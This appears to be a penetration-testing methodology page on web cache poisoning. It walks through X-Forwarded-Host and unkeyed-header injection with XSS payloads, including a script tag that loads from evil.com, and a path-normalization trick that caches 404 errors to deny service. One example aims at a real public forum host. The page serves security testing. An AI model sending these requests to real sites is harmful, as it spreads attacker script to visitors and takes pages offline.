Web Cache Poisoning

Check List

Methodology

Black Box

Web Cache Poisoning via X-Forwarded-Host Header Injection

Navigate to the target web application and identify whether the application reflects the value of the X-Forwarded-Host header in the HTTP response

Using Burp Suite, intercept the request and inject a malicious payload into the X-Forwarded-Host header:

GET /?xx HTTP/1.1
Host: meta.discourse.org
X-Forwarded-Host: cacheattack'"><script>alert(document.domain)</script>

Send the request and observe the server response to check whether the injected payload is reflected and processed in the HTML response

Then verify whether the HTTP response is cached by the application

Send the request with the same headers (Request Start Line, Accept, Accept-Encoding) and access the cached page

GET /?xx HTTP/1.1
Host: meta.discourse.org
Accept: text/html
Accept-Encoding: gzip, deflate

Observe the server response and check whether the injected payload is served from the cache and executed for subsequent users

If the injected payload is stored in the cache and executed for other users, the vulnerability is confirmed

Web Cache Poisoning via Unkeyed Header Injection

Navigate to the target web application and identify whether the application uses any form of web cache such as CDN cache, reverse proxy cache, or browser cache

Send an initial request with a harmless parameter to determine cache behavior

GET /?lang=en HTTP/1.1
Host: victim.com
Accept-Language: en

Observe the server response and check for cache-related headers such as

Cache-Control: public
X-Cache: MISS
Age: 0

Send the same request again

GET /?lang=en HTTP/1.1
Host: victim.com
Accept-Language: en

If the response now contains

X-Cache: HIT
Age: >0

This confirms that the response is being cached by the application, Intercept the request using a proxy tool and modify an unkeyed header or parameter that may be processed by the application but ignored by the cache key

Inject a malicious payload into the header

GET /?lang=en HTTP/1.1
Host: victim.com
Accept-Language: en"><script src=//evil.com/x.js></script>

Send the request and observe whether the injected value is reflected in the HTML response

Repeat the same request from a different session or IP address using identical cache key headers

GET /?lang=en HTTP/1.1
Host: victim.com
Accept: text/html
Accept-Encoding: gzip, deflate

Observe the server response and verify whether the injected payload is served from cache to subsequent users

If the payload is cached and executed for multiple users until the cache expires, the Web Cache Poisoning vulnerability is confirmed

Web Cache Poisoning via Path Normalization Discrepancy

Go to the target site.

Intercept a legitimate request to a JavaScript file

Replace forward slashes with backslashes in the path

Add a cache buster parameter (?test=123) to avoid affecting live traffic

Send the malformed request multiple times until cached

Result: The 404 response gets cached, causing DoS for all subsequent requests

You can use double slash (//) techniques or Unicode characters

White Box

Cheat Sheet

PreviousHost Header Injection NextServer Side Template Injection

Last updated 1 month ago

hashtagCheck List

hashtagMethodology

hashtagBlack Box

hashtagWeb Cache Poisoning via X-Forwarded-Host Header Injection

hashtagWeb Cache Poisoning via Unkeyed Header Injection

hashtagWeb Cache Poisoning via Path Normalization Discrepancy

hashtagWhite Box

hashtagCheat Sheet